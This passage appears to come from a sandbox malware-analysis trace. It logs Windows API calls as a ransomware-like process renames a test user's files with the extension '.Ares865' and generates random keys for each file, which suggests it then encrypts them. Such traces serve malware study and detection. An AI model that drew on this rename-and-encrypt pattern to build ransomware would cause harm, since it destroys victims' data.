halpmcxz\\contacts\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0107.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=412) returned 1 [0107.841] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.844] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.847] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.Ares865") returned 68 [0107.847] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.ares865"), dwFlags=0x1) returned 1 [0107.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1174) returned 1 [0107.848] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.849] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.849] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.851] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.852] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.852] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.852] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.Ares865") returned 68 [0107.852] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.ares865"), dwFlags=0x1) returned 1 [0107.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1172) returned 1 [0107.854] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.855] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.855] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.857] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.857] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.857] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.858] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0107.859] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\0y2JaFXisom.swf.Ares865") returned 70 [0107.859] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\0y2JaFXisom.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\0y2jafxisom.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\0y2JaFXisom.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\0y2jafxisom.swf.ares865"), dwFlags=0x1) returned 1 [0107.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\0y2JaFXisom.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\0y2jafxisom.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.861] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=55220) returned 1 [0107.861] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.862] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.862] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.863] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.864] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.864] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.867] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1ddGr.gif.Ares865") returned 64 [0107.867] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1ddGr.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1ddgr.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1ddGr.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1ddgr.gif.ares865"), dwFlags=0x1) returned 1 [0107.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1ddGr.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1ddgr.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83332) returned 1 [0107.869] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.870] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.870] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.872] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.873] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.873] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1rn0GLednnbEV.mp4.Ares865") returned 72 [0107.876] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1rn0GLednnbEV.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1rn0glednnbev.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1rn0GLednnbEV.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1rn0glednnbev.mp4.ares865"), dwFlags=0x1) returned 1 [0107.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1rn0GLednnbEV.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1rn0glednnbev.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.878] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21227) returned 1 [0107.878] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.879] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.880] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.880] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.882] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1YQ5e.avi.Ares865") returned 64 [0107.882] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1YQ5e.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1yq5e.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1YQ5e.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1yq5e.avi.ares865"), dwFlags=0x1) returned 1 [0107.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\1YQ5e.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\1yq5e.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.884] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=78720) returned 1 [0107.884] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.885] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.885] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.887] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.890] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\43mfdkhT.docx.Ares865") returned 68 [0107.890] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\43mfdkhT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\43mfdkht.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\43mfdkhT.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\43mfdkht.docx.ares865"), dwFlags=0x1) returned 1 [0107.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\43mfdkhT.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\43mfdkht.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11277) returned 1 [0107.892] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.893] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.893] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.894] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\4p8QQ.mkv.Ares865") returned 64 [0107.896] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\4p8QQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\4p8qq.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\4p8QQ.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\4p8qq.mkv.ares865"), dwFlags=0x1) returned 1 [0107.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\4p8QQ.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\4p8qq.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87520) returned 1 [0107.898] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.898] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.898] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.901] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.902] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.902] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.904] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\5ewENBsG0d5AW.swf.Ares865") returned 72 [0107.904] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\5ewENBsG0d5AW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\5ewenbsg0d5aw.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\5ewENBsG0d5AW.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\5ewenbsg0d5aw.swf.ares865"), dwFlags=0x1) returned 1 [0107.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\5ewENBsG0d5AW.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\5ewenbsg0d5aw.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.906] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12434) returned 1 [0107.906] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.906] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.907] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.907] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.908] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.908] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\7CxpSKLD21xo8yZpNs.mp4.Ares865") returned 77 [0107.910] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\7CxpSKLD21xo8yZpNs.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\7cxpskld21xo8yzpns.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\7CxpSKLD21xo8yZpNs.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\7cxpskld21xo8yzpns.mp4.ares865"), dwFlags=0x1) returned 1 [0107.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\7CxpSKLD21xo8yZpNs.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\7cxpskld21xo8yzpns.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.911] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82648) returned 1 [0107.912] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.912] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.912] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.914] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.918] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\8CxiQK6E8YEe.csv.Ares865") returned 71 [0107.918] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\8CxiQK6E8YEe.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\8cxiqk6e8yee.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\8CxiQK6E8YEe.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\8cxiqk6e8yee.csv.ares865"), dwFlags=0x1) returned 1 [0107.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\8CxiQK6E8YEe.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\8cxiqk6e8yee.csv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27397) returned 1 [0107.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.920] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.922] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.922] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.922] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\bGBN8_H.mp3.Ares865") returned 66 [0107.924] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\bGBN8_H.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\bgbn8_h.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\bGBN8_H.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\bgbn8_h.mp3.ares865"), dwFlags=0x1) returned 1 [0107.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\bGBN8_H.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\bgbn8_h.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91721) returned 1 [0107.926] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.929] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.930] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.930] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.932] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\c8I0-fHNFgj2G8UmsIR.m4a.Ares865") returned 78 [0107.933] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\c8I0-fHNFgj2G8UmsIR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\c8i0-fhnfgj2g8umsir.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\c8I0-fHNFgj2G8UmsIR.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\c8i0-fhnfgj2g8umsir.m4a.ares865"), dwFlags=0x1) returned 1 [0107.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\c8I0-fHNFgj2G8UmsIR.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\c8i0-fhnfgj2g8umsir.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95717) returned 1 [0107.935] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.936] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.936] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.938] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.939] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.939] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.941] wsprintfW 